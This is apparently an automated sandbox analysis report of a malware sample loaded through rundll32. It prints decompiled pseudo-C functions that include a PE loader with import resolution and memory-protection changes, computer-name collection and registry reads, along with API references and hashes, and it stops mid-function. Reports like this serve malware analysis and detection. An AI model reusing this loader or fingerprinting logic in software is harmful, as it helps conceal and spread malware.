0x00401c71
0x00401c7c

APIs

lstrlenW.KERNEL32(?), ref: 00401C25
ExitThread.KERNEL32 ref: 00401C7C

Memory Dump Source

Source File: 00000003.00000002.950458300.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.950449846.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.950465136.0000000000403000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.950497345.0000000000405000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.950532385.0000000000406000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_rundll32.jbxd

Similarity

API ID: ExitThreadlstrlen
String ID:
API String ID: 2636182767-0
Opcode ID: f959fd5dec86d1ed9483960a9e1aa422b5814ea58d54d49f0de2b415be9ff4e9
Instruction ID: 6a6c7c8e180c95c4525c5684b83ff4d66f4962c4d19e8c41fd270bbd4965c872
Opcode Fuzzy Hash: f959fd5dec86d1ed9483960a9e1aa422b5814ea58d54d49f0de2b415be9ff4e9
Instruction Fuzzy Hash: CE11E2715082019BE711EB65DD8CE9B77ECAB44704F04493BB601FB2F1EB34E9458B5A

Uniqueness

Uniqueness Score: -1.00%

Function 044B41FA Relevance: 3.0, APIs: 2, Instructions: 50
memorytimeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E044B41FA(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, signed int _a16) {
				struct _FILETIME _v12;
				signed int _t11;
				void* _t16;
				short _t19;
				void* _t22;
				void* _t24;
				void* _t25;
				short* _t26;

				_t24 = __edx;
				_t25 = E044B61FC(_t11, _a12);
				if(_t25 == 0) {
					_t22 = 8;
				} else {
					_t26 = _t25 + _a16 * 2;
					 *_t26 = 0; // executed
					_t16 = E044B2AE4(__ecx, _a4, _a8, _t25); // executed
					_t22 = _t16;
					if(_t22 == 0) {
						GetSystemTimeAsFileTime( &_v12);
						_t19 = 0x5f;
						 *_t26 = _t19;
						_t22 = E044B4822(_t24, _a4, 0x80000001, _a8, _t25,  &_v12, 8);
					}
					HeapFree( *0x44ba2d8, 0, _t25);
				}
				return _t22;
			}

0x044b41fa
0x044b420b
0x044b420f
0x044b426a
0x044b4211
0x044b4218
0x044b4220
0x044b4223
0x044b4228
0x044b422c
0x044b4232
0x044b423a
0x044b423d
0x044b4255
0x044b4255
0x044b4260
0x044b4260
0x044b4271

APIs

Part of subcall function 044B61FC: lstrlen.KERNEL32(?,00000000,04E69D70,00000000,044B39E8,04E69F93,69B25F44,?,?,?,?,69B25F44,00000005,044BA00C,4D283A53,?), ref: 044B6203
Part of subcall function 044B61FC: mbstowcs.NTDLL ref: 044B622C
Part of subcall function 044B61FC: memset.NTDLL ref: 044B623E

GetSystemTimeAsFileTime.KERNEL32(004F0053,004F0053,00000014,00000000,00000008,00000000,76D85520,00000008,00000014,004F0053,04E693F4), ref: 044B4232
HeapFree.KERNEL32(00000000,00000000,004F0053,00000014,00000000,00000008,00000000,76D85520,00000008,00000014,004F0053,04E693F4), ref: 044B4260

Memory Dump Source

Source File: 00000003.00000002.951691155.00000000044B1000.00000020.10000000.00040000.00000000.sdmp, Offset: 044B0000, based on PE: true

Associated: 00000003.00000002.951646149.00000000044B0000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.951796245.00000000044B9000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.951843562.00000000044BA000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.951894977.00000000044BC000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_44b0000_rundll32.jbxd

Similarity

API ID: Time$FileFreeHeapSystemlstrlenmbstowcsmemset
String ID:
API String ID: 1500278894-0
Opcode ID: 6a4197b0c2b1af57856cd7907494c0f9361539a85b0b05a3c61fd2f9a8770c4d
Instruction ID: aeb448dfce4e5dfd14163441a774f9cb4315318c9982a487e26d6f187fafb852
Opcode Fuzzy Hash: 6a4197b0c2b1af57856cd7907494c0f9361539a85b0b05a3c61fd2f9a8770c4d
Instruction Fuzzy Hash: 0B01D431200209BBEF215F99DC44EDB7B78FF84704F00002AFA809A162D671E814D7A0

Uniqueness

Uniqueness Score: -1.00%

Function 044B22D7 Relevance: 3.0, APIs: 2, Instructions: 40
COMMON

Download Yara Rule

C-Code - Quality: 37%

			E044B22D7(void* __ecx) {
				signed int _v8;
				void* _t15;
				void* _t19;
				void* _t20;
				void* _t22;
				intOrPtr* _t23;

				_t23 = __imp__;
				_t20 = 0;
				_v8 = _v8 & 0;
				 *_t23(3, 0,  &_v8, _t19, _t22, __ecx); // executed
				_t10 = _v8;
				if(_v8 != 0) {
					_t20 = E044B6D63(_t10 + 1);
					if(_t20 != 0) {
						_t15 =  *_t23(3, _t20,  &_v8); // executed
						if(_t15 != 0) {
							 *((char*)(_v8 + _t20)) = 0;
						} else {
							E044B6C2C(_t20);
							_t20 = 0;
						}
					}
				}
				return _t20;
			}

0x044b22dc
0x044b22e7
0x044b22e9
0x044b22ef
0x044b22f1
0x044b22f6
0x044b22ff
0x044b2303
0x044b230c
0x044b2310
0x044b231f
0x044b2312
0x044b2313
0x044b2318
0x044b2318
0x044b2310
0x044b2303
0x044b2328

APIs

GetComputerNameExA.KERNEL32(00000003,00000000,044B57B5,00000000,00000000,?,7477C740,044B57B5), ref: 044B22EF

Part of subcall function 044B6D63: RtlAllocateHeap.NTDLL(00000000,00000000,044B5D7B), ref: 044B6D6F

GetComputerNameExA.KERNEL32(00000003,00000000,044B57B5,044B57B6,?,7477C740,044B57B5), ref: 044B230C

Part of subcall function 044B6C2C: RtlFreeHeap.NTDLL(00000000,00000000,044B5E1D,00000000,?,?,00000000), ref: 044B6C38

Memory Dump Source

Source File: 00000003.00000002.951691155.00000000044B1000.00000020.10000000.00040000.00000000.sdmp, Offset: 044B0000, based on PE: true

Associated: 00000003.00000002.951646149.00000000044B0000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.951796245.00000000044B9000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.951843562.00000000044BA000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.951894977.00000000044BC000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_44b0000_rundll32.jbxd

Similarity

API ID: ComputerHeapName$AllocateFree
String ID:
API String ID: 187446995-0
Opcode ID: be8c69fb8d1745f2743500087cb5c67ae25e2a29b02faa6a2952a94504a89429
Instruction ID: 5c186c047b2198bb67f74e6a99e4b7ec5d232786c33ec4160eff179bd0f04b44
Opcode Fuzzy Hash: be8c69fb8d1745f2743500087cb5c67ae25e2a29b02faa6a2952a94504a89429
Instruction Fuzzy Hash: 42F05B66604205BAEF21D6668C04FEF76FCDBC5650F15109AE984D3141E9B0EE0196F2

Uniqueness

Uniqueness Score: -1.00%

Function 044B1CD6 Relevance: 3.0, APIs: 2, Instructions: 26
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E044B1CD6(signed int __edx, intOrPtr _a4) {
				void* _t3;
				void* _t5;
				void* _t7;
				void* _t8;
				void* _t9;
				signed int _t10;

				_t10 = __edx;
				_t3 = HeapCreate(0, 0x400000, 0); // executed
				 *0x44ba2d8 = _t3;
				if(_t3 == 0) {
					_t8 = 8;
					return _t8;
				}
				 *0x44ba1c8 = GetTickCount();
				_t5 = E044B6D78(_a4);
				if(_t5 == 0) {
					_t5 = E044B4B89(_t9, _a4); // executed
					if(_t5 == 0) {
						if(E044B6B1C(_t9) != 0) {
							 *0x44ba300 = 1; // executed
						}
						_t7 = E044B3D2C(_t10); // executed
						return _t7;
					}
				}
				return _t5;
			}

0x044b1cd6
0x044b1cdf
0x044b1ce5
0x044b1cec
0x044b1cf0
0x00000000
0x044b1cf0
0x044b1cfd
0x044b1d02
0x044b1d09
0x044b1d0f
0x044b1d16
0x044b1d1f
0x044b1d21
0x044b1d21
0x044b1d2b
0x00000000
0x044b1d2b
0x044b1d16
0x044b1d30

APIs

HeapCreate.KERNEL32(00000000,00400000,00000000,044B5E54,?), ref: 044B1CDF
GetTickCount.KERNEL32 ref: 044B1CF3

Memory Dump Source

Source File: 00000003.00000002.951691155.00000000044B1000.00000020.10000000.00040000.00000000.sdmp, Offset: 044B0000, based on PE: true

Associated: 00000003.00000002.951646149.00000000044B0000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.951796245.00000000044B9000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.951843562.00000000044BA000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.951894977.00000000044BC000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_44b0000_rundll32.jbxd

Similarity

API ID: CountCreateHeapTick
String ID:
API String ID: 2177101570-0
Opcode ID: 035f2cc928bf71dd8553fe48d511f12622babad8b6a2d4396a78644458ed531a
Instruction ID: 9a352a23d07196abc34a4f28feb935d29b7bae17d2cfeaf3266791bb5f279e0a
Opcode Fuzzy Hash: 035f2cc928bf71dd8553fe48d511f12622babad8b6a2d4396a78644458ed531a
Instruction Fuzzy Hash: D5F06570204701A7FF216F72AD1479636B8AB007C4F10482BE9C1D4281EB79F80096F2

Uniqueness

Uniqueness Score: -1.00%

Function 044B375F Relevance: 1.6, APIs: 1, Instructions: 70
synchronizationCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E044B375F(signed int* __ecx, intOrPtr _a4, signed int* _a8, signed int* _a12) {
				intOrPtr _v12;
				signed int _v20;
				intOrPtr _v24;
				signed int _v60;
				char _v68;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t14;
				signed int* _t16;
				signed int _t25;
				signed int _t26;
				signed int* _t28;
				signed int _t30;

				_t28 = __ecx;
				_t14 =  *0x44ba368; // 0x4e69618
				_v12 = _t14;
				_t16 = _a12;
				_t30 = 8;
				if(_t16 != 0) {
					 *_t16 =  *_t16 & 0x00000000;
				}
				do {
					_t31 =  &_v68;
					if(E044B227F( &_v68) == 0) {
						goto L16;
					}
					_t30 = E044B6954(_t31, _a4, _v12);
					if(_t30 == 0) {
						_t25 = E044B1CA5(_t31, _t28); // executed
						_t30 = _t25;
						if(_t30 != 0) {
							if(_t30 == 0x102) {
								E044BA000 = E044BA000 + 0xea60;
							}
						} else {
							if(_v24 != 0xc8) {
								_t30 = 0xe8;
							} else {
								_t26 = _v20;
								if(_t26 == 0) {
									_t30 = 0x10d2;
								} else {
									_t28 = _a8;
									if(_t28 != 0) {
										_v60 = _v60 & _t30;
										 *_t28 = _v60;
										_t28 = _a12;
										if(_t28 != 0) {
											 *_t28 = _t26;
										}
									}
								}
							}
						}
					}
					E044B4274( &_v68, 0x102, _t28, _t30);
					L16:
				} while (_t30 == 0x2f19 && WaitForSingleObject( *0x44ba30c, 0) == 0x102);
				return _t30;
			}

0x044b375f
0x044b3765
0x044b376c
0x044b3774
0x044b377a
0x044b377d
0x044b377f
0x044b377f
0x044b3787
0x044b3787
0x044b3791
0x00000000
0x00000000
0x044b37a0
0x044b37a4
0x044b37a8
0x044b37ad
0x044b37b1
0x044b37ed
0x044b37ef
0x044b37ef
0x044b37b3
0x044b37ba
0x044b37e4
0x044b37bc
0x044b37bc
0x044b37c1
0x044b37dd
0x044b37c3
0x044b37c3
0x044b37c8
0x044b37cd
0x044b37d0
0x044b37d2
0x044b37d7
0x044b37d9
0x044b37d9
0x044b37d7
0x044b37c8
0x044b37c1
0x044b37ba
0x044b37b1
0x044b37fc
0x044b3801
0x044b3801
0x044b3825

APIs

WaitForSingleObject.KERNEL32(00000000,76DC81D0,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 044B3811

Memory Dump Source

Source File: 00000003.00000002.951691155.00000000044B1000.00000020.10000000.00040000.00000000.sdmp, Offset: 044B0000, based on PE: true

Associated: 00000003.00000002.951646149.00000000044B0000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.951796245.00000000044B9000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.951843562.00000000044BA000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.951894977.00000000044BC000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_44b0000_rundll32.jbxd

Similarity

API ID: ObjectSingleWait
String ID:
API String ID: 24740636-0
Opcode ID: f6eda391ca784a762e52a9c236cb28f6ecb38a207934b3f62cb36cd552a62a72
Instruction ID: 52bbae00469c2771be04c22cca3207d4b121be75738db5c63345a4209d892027
Opcode Fuzzy Hash: f6eda391ca784a762e52a9c236cb28f6ecb38a207934b3f62cb36cd552a62a72
Instruction Fuzzy Hash: DE2158B67002859BEF21CE6BD891AEE76A5BB81354F14802BED81A7240DB74FC4187E0

Uniqueness

Uniqueness Score: -1.00%

Function 044B1B6F Relevance: 1.5, APIs: 1, Instructions: 49
COMMON

Download Yara Rule

C-Code - Quality: 34%

			E044B1B6F(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
				intOrPtr _v12;
				void* _v18;
				char _v20;
				intOrPtr _t15;
				void* _t17;
				intOrPtr _t19;
				void* _t23;

				_v20 = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosw");
				_t15 =  *0x44ba348; // 0x9ad5a8
				_t4 = _t15 + 0x44bb3a0; // 0x4e68948
				_t20 = _t4;
				_t6 = _t15 + 0x44bb124; // 0x650047
				_t17 = E044B46CB(_t4, _a4, 0x80000002, _a8, _t6, _a12, _t4,  &_v20); // executed
				if(_t17 < 0) {
					_t23 = _t17;
				} else {
					_t23 = 8;
					if(_v20 != _t23) {
						_t23 = 1;
					} else {
						_t19 = E044B59AE(_t20, _v12);
						if(_t19 != 0) {
							 *_a16 = _t19;
							_t23 = 0;
						}
						__imp__#6(_v12);
					}
				}
				return _t23;
			}

0x044b1b79
0x044b1b80
0x044b1b81
0x044b1b82
0x044b1b83
0x044b1b89
0x044b1b8e
0x044b1b8e
0x044b1b98
0x044b1baa
0x044b1bb1
0x044b1bdf
0x044b1bb3
0x044b1bb5
0x044b1bba
0x044b1bdc
0x044b1bbc
0x044b1bbf
0x044b1bc6
0x044b1bcb
0x044b1bcd
0x044b1bcd
0x044b1bd2
0x044b1bd2
0x044b1bba
0x044b1be6

APIs

Part of subcall function 044B46CB: SysFreeString.OLEAUT32(?), ref: 044B47AA

Part of subcall function 044B59AE: lstrlenW.KERNEL32(004F0053,00000000,00000000,?,?,044B5EFA,004F0053,00000000,?), ref: 044B59B7
Part of subcall function 044B59AE: memcpy.NTDLL(00000000,004F0053,?,?,00000002,?,?,044B5EFA,004F0053,00000000,?), ref: 044B59E1
Part of subcall function 044B59AE: memset.NTDLL ref: 044B59F5

SysFreeString.OLEAUT32(00000000), ref: 044B1BD2

Memory Dump Source

Source File: 00000003.00000002.951691155.00000000044B1000.00000020.10000000.00040000.00000000.sdmp, Offset: 044B0000, based on PE: true

Associated: 00000003.00000002.951646149.00000000044B0000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.951796245.00000000044B9000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.951843562.00000000044BA000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.951894977.00000000044BC000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_44b0000_rundll32.jbxd

Similarity

API ID: FreeString$lstrlenmemcpymemset
String ID:
API String ID: 397948122-0
Opcode ID: 80770517ed1e4b8f3f2ca0d3937f438fb972136c46d975360db97b6a6e212864
Instruction ID: 7c99281ca01f1f4695b689a28e7383f8b08338eb6f813e0973d3017692426339
Opcode Fuzzy Hash: 80770517ed1e4b8f3f2ca0d3937f438fb972136c46d975360db97b6a6e212864
Instruction Fuzzy Hash: 27015E32504119BFDF119FA9CC01DEABBB9FB04690F04482AE941E7161E770A912D7E0

Uniqueness

Uniqueness Score: -1.00%

Function 00401FB2 Relevance: 1.5, APIs: 1, Instructions: 8
COMMON

Download Yara Rule

C-Code - Quality: 37%

			E00401FB2(void* __eax, intOrPtr _a4) {

				 *0x4041d0 =  *0x4041d0 & 0x00000000;
				_push(0);
				_push(0x4041cc);
				_push(1);
				_push(_a4);
				 *0x4041c8 = 0xc; // executed
				L004010BE(); // executed
				return __eax;
			}

0x00401fb2
0x00401fb9
0x00401fbb
0x00401fc0
0x00401fc2
0x00401fc6
0x00401fd0
0x00401fd5

APIs

ConvertStringSecurityDescriptorToSecurityDescriptorA.ADVAPI32(00401BF6,00000001,004041CC,00000000), ref: 00401FD0

Memory Dump Source

Source File: 00000003.00000002.950458300.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.950449846.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.950465136.0000000000403000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.950497345.0000000000405000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.950532385.0000000000406000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_rundll32.jbxd

Similarity

API ID: DescriptorSecurity$ConvertString
String ID:
API String ID: 3907675253-0
Opcode ID: ecd42516f24ae11830152b655fb12a873813b1f072e7efb964ffb831fc1a0f60
Instruction ID: 1acf57aef84a5c475451222c9dea1d8de6ae58133c9941aaac2b578c9df51b57
Opcode Fuzzy Hash: ecd42516f24ae11830152b655fb12a873813b1f072e7efb964ffb831fc1a0f60
Instruction Fuzzy Hash: A0C04CF4250341A6E710AF40DD8AF457A5177A470DF200629F744381E1C3FA10D4851E

Uniqueness

Uniqueness Score: -1.00%

Function 044B6C2C Relevance: 1.5, APIs: 1, Instructions: 5
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E044B6C2C(void* _a4) {
				char _t2;

				_t2 = RtlFreeHeap( *0x44ba2d8, 0, _a4); // executed
				return _t2;
			}

0x044b6c38
0x044b6c3e

APIs

RtlFreeHeap.NTDLL(00000000,00000000,044B5E1D,00000000,?,?,00000000), ref: 044B6C38

Memory Dump Source

Source File: 00000003.00000002.951691155.00000000044B1000.00000020.10000000.00040000.00000000.sdmp, Offset: 044B0000, based on PE: true

Associated: 00000003.00000002.951646149.00000000044B0000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.951796245.00000000044B9000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.951843562.00000000044BA000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.951894977.00000000044BC000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_44b0000_rundll32.jbxd

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: 0df6d7566fb076d9e2880ad99e82a8acb85456e2a68d3595bec296d97dff9aea
Instruction ID: 68a710ba69ab68aa697c621745fff4c1019bacd3563d39aa10abd6c0fd357a68
Opcode Fuzzy Hash: 0df6d7566fb076d9e2880ad99e82a8acb85456e2a68d3595bec296d97dff9aea
Instruction Fuzzy Hash: 21B012B1200200ABEB114F00DE04F05BA21E750700F004010B344100B082360C30FB55

Uniqueness

Uniqueness Score: -1.00%

Function 044B6D63 Relevance: 1.5, APIs: 1, Instructions: 5
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E044B6D63(long _a4) {
				void* _t2;

				_t2 = RtlAllocateHeap( *0x44ba2d8, 0, _a4); // executed
				return _t2;
			}

0x044b6d6f
0x044b6d75

APIs

RtlAllocateHeap.NTDLL(00000000,00000000,044B5D7B), ref: 044B6D6F

Memory Dump Source

Source File: 00000003.00000002.951691155.00000000044B1000.00000020.10000000.00040000.00000000.sdmp, Offset: 044B0000, based on PE: true

Associated: 00000003.00000002.951646149.00000000044B0000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.951796245.00000000044B9000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.951843562.00000000044BA000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.951894977.00000000044BC000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_44b0000_rundll32.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 8cb3b4e8ab1c4caac68b1c464f166e288b287e177578ee67a737a46eb889c176
Instruction ID: dd8dc62b0a9e7802c0aab60085532fb76257ccc5ed484177ab37f823d61a332e
Opcode Fuzzy Hash: 8cb3b4e8ab1c4caac68b1c464f166e288b287e177578ee67a737a46eb889c176
Instruction Fuzzy Hash: 29B01271104200BBEA014B10DD08F05BB21F750700F004010B344500B082370C60FB44

Uniqueness

Uniqueness Score: -1.00%

Function 02D510FF Relevance: 1.3, APIs: 1, Instructions: 85memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32 ref: 02D51177

Memory Dump Source

Source File: 00000003.00000002.951031091.0000000002D50000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2d50000_rundll32.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 200654caf8872bfb84d534b6df6c6610af57454f1857a22d0510d06dea24e8a1
Instruction ID: 7eb2594e5d8990ddd35ca188adcf3182cded05c77c1c2a3232e6550bd979c545
Opcode Fuzzy Hash: 200654caf8872bfb84d534b6df6c6610af57454f1857a22d0510d06dea24e8a1
Instruction Fuzzy Hash: DA4105B09002068FDB04CF54C5947AEBBF0FF48304F24856DD858AB341D77AA946CF95

Uniqueness

Uniqueness Score: -1.00%

Function 0040153F Relevance: 1.3, APIs: 1, Instructions: 70
COMMON

Download Yara Rule

C-Code - Quality: 85%

			E0040153F(void* __eax) {
				char _v8;
				void* _v12;
				void* __edi;
				void* _t18;
				long _t26;
				long _t29;
				intOrPtr _t40;
				void* _t41;
				intOrPtr* _t42;
				void* _t44;

				_t41 = __eax;
				_t16 =  *0x4041c0;
				_t33 =  *((intOrPtr*)( *((intOrPtr*)(__eax + 0x3c)) + __eax + 0x50)) +  *0x4041c0 - 0x69b24f45 &  !( *0x4041c0 - 0x69b24f45);
				_t18 = E00401446( *((intOrPtr*)( *((intOrPtr*)(__eax + 0x3c)) + __eax + 0x50)) +  *0x4041c0 - 0x69b24f45 &  !( *0x4041c0 - 0x69b24f45),  *((intOrPtr*)( *((intOrPtr*)(__eax + 0x3c)) + __eax + 0x50)) +  *0x4041c0 - 0x69b24f45 &  !( *0x4041c0 - 0x69b24f45), _t16 + 0x964da0fc,  &_v8,  &_v12); // executed
				if(_t18 != 0) {
					_t29 = 8;
					goto L8;
				} else {
					_t40 = _v8;
					_t29 = E0040113D(_t33, _t40, _t41);
					if(_t29 == 0) {
						_t44 =  *((intOrPtr*)(_t40 + 0x3c)) + _t40;
						_t29 = E004015E3(_t40, _t44);
						if(_t29 == 0) {
							_t26 = E00401A9D(_t44, _t40); // executed
							_t29 = _t26;
							if(_t29 == 0) {
								_push(_t26);
								_push(1);
								_push(_t40);
								if( *((intOrPtr*)( *((intOrPtr*)(_t44 + 0x28)) + _t40))() == 0) {
									_t29 = GetLastError();
								}
							}
						}
					}
					_t42 = _v12;
					 *((intOrPtr*)(_t42 + 0x18))( *((intOrPtr*)(_t42 + 0x1c))( *_t42));
					E0040152A(_t42);
					L8:
					return _t29;
				}
			}

0x00401547
0x00401549
0x00401565
0x00401576
0x0040157d
0x004015db
0x00000000
0x0040157f
0x0040157f
0x00401589
0x0040158d
0x00401592
0x0040159a
0x0040159e
0x004015a3
0x004015a8
0x004015ac
0x004015b1
0x004015b2
0x004015b6
0x004015bb
0x004015c3
0x004015c3
0x004015bb
0x004015ac
0x0040159e
0x004015c5
0x004015ce
0x004015d2
0x004015dc
0x004015e2
0x004015e2

APIs

Part of subcall function 00401446: GetModuleHandleA.KERNEL32(?,00000020), ref: 0040146A
Part of subcall function 00401446: GetProcAddress.KERNEL32(00000000,?), ref: 0040148C
Part of subcall function 00401446: GetProcAddress.KERNEL32(00000000,?), ref: 004014A2
Part of subcall function 00401446: GetProcAddress.KERNEL32(00000000,?), ref: 004014B8
Part of subcall function 00401446: GetProcAddress.KERNEL32(00000000,?), ref: 004014CE
Part of subcall function 00401446: GetProcAddress.KERNEL32(00000000,?), ref: 004014E4

Part of subcall function 004015E3: LoadLibraryA.KERNEL32(?,?,00000000,?,0040159A), ref: 0040161B

Part of subcall function 00401A9D: VirtualProtect.KERNEL32(00000000,?,?,?,?,?,00000000,?), ref: 00401AD6
Part of subcall function 00401A9D: VirtualProtect.KERNEL32(00000000,?,?,?), ref: 00401B4B
Part of subcall function 00401A9D: GetLastError.KERNEL32 ref: 00401B51

GetLastError.KERNEL32 ref: 004015BD

Memory Dump Source

Source File: 00000003.00000002.950458300.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.950449846.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.950465136.0000000000403000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.950497345.0000000000405000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.950532385.0000000000406000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_rundll32.jbxd

Similarity

API ID: AddressProc$ErrorLastProtectVirtual$HandleLibraryLoadModule
String ID:
API String ID: 3135819546-0
Opcode ID: 89dc334e324781066015fc3c795a5eaf2b560c41582afc7c540ed698c9449d8f
Instruction ID: eea4ea5154a5aefbb647ba05e6a0f56c4ae443b02ca2aac04c595dc78db400c3
Opcode Fuzzy Hash: 89dc334e324781066015fc3c795a5eaf2b560c41582afc7c540ed698c9449d8f
Instruction Fuzzy Hash: 4A11E976700601BBC721AED68C84DAB77ECAFC8318700053AEA02BB651EEB4ED058794

Uniqueness

Uniqueness Score: -1.00%

Function 044B155C Relevance: 1.3, APIs: 1, Instructions: 43
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E044B155C(intOrPtr* __edi, void* _a4, intOrPtr _a8, unsigned int _a12) {
				void* _t21;
				void* _t22;
				signed int _t24;
				intOrPtr* _t26;
				void* _t27;

				_t26 = __edi;
				if(_a4 == 0) {
					L2:
					_t27 = E044B12CA(_a4, 0x80000002, _a8, _a12,  &_a4,  &_a12);
					if(_t27 == 0) {
						_t24 = _a12 >> 1;
						if(_t24 == 0) {
							_t27 = 2;
							HeapFree( *0x44ba2d8, 0, _a4);
						} else {
							_t21 = _a4;
							 *((short*)(_t21 + _t24 * 2 - 2)) = 0;
							 *_t26 = _t21;
						}
					}
					L6:
					return _t27;
				}
				_t22 = E044B1B6F(_a4, _a8, _a12, __edi); // executed
				_t27 = _t22;
				if(_t27 == 0) {
					goto L6;
				}
				goto L2;
			}

0x044b155c
0x044b1564
0x044b157b
0x044b1596
0x044b159a
0x044b159f
0x044b15a1
0x044b15b3
0x044b15bf
0x044b15a3
0x044b15a3
0x044b15a8
0x044b15ad
0x044b15ad
0x044b15a1
0x044b15c5
0x044b15c9
0x044b15c9
0x044b1570
0x044b1575
0x044b1579
0x00000000
0x00000000
0x00000000

APIs

Part of subcall function 044B1B6F: SysFreeString.OLEAUT32(00000000), ref: 044B1BD2

HeapFree.KERNEL32(00000000,00000000,00000000,80000002,76DDF710,?,00000000,?,00000000,?,044B21A9,?,004F0053,04E69400,00000000,?), ref: 044B15BF

Memory Dump Source

Source File: 00000003.00000002.951691155.00000000044B1000.00000020.10000000.00040000.00000000.sdmp, Offset: 044B0000, based on PE: true

Associated: 00000003.00000002.951646149.00000000044B0000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.951796245.00000000044B9000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.951843562.00000000044BA000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.951894977.00000000044BC000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_44b0000_rundll32.jbxd

Similarity

API ID: Free$HeapString
String ID:
API String ID: 3806048269-0
Opcode ID: ff016b721504bb2d29923c1118119897882b04eecf1bbd5c0ec3fb18101f3a9d
Instruction ID: f420ee9d8c12f429fc622ce8afcda250d6b484e9843298771302c068048ef987
Opcode Fuzzy Hash: ff016b721504bb2d29923c1118119897882b04eecf1bbd5c0ec3fb18101f3a9d
Instruction Fuzzy Hash: 6E014F32500559BBDF229F94CC11EEB7BA5EF04790F04C419FE459A260D731E960DBE0

Uniqueness

Uniqueness Score: -1.00%

Function 044B24B3 Relevance: 1.3, APIs: 1, Instructions: 36
stringCOMMON

Download Yara Rule

C-Code - Quality: 75%

			E044B24B3(void* __ecx, void* __edx, void* _a4, void* _a8) {
				void* _t13;
				void* _t21;

				_t11 =  &_a4;
				_t21 = 0;
				__imp__( &_a8);
				_t13 = E044B5FBB( &_a4 + 1, 1, _a8, _a4, _a4, _t11); // executed
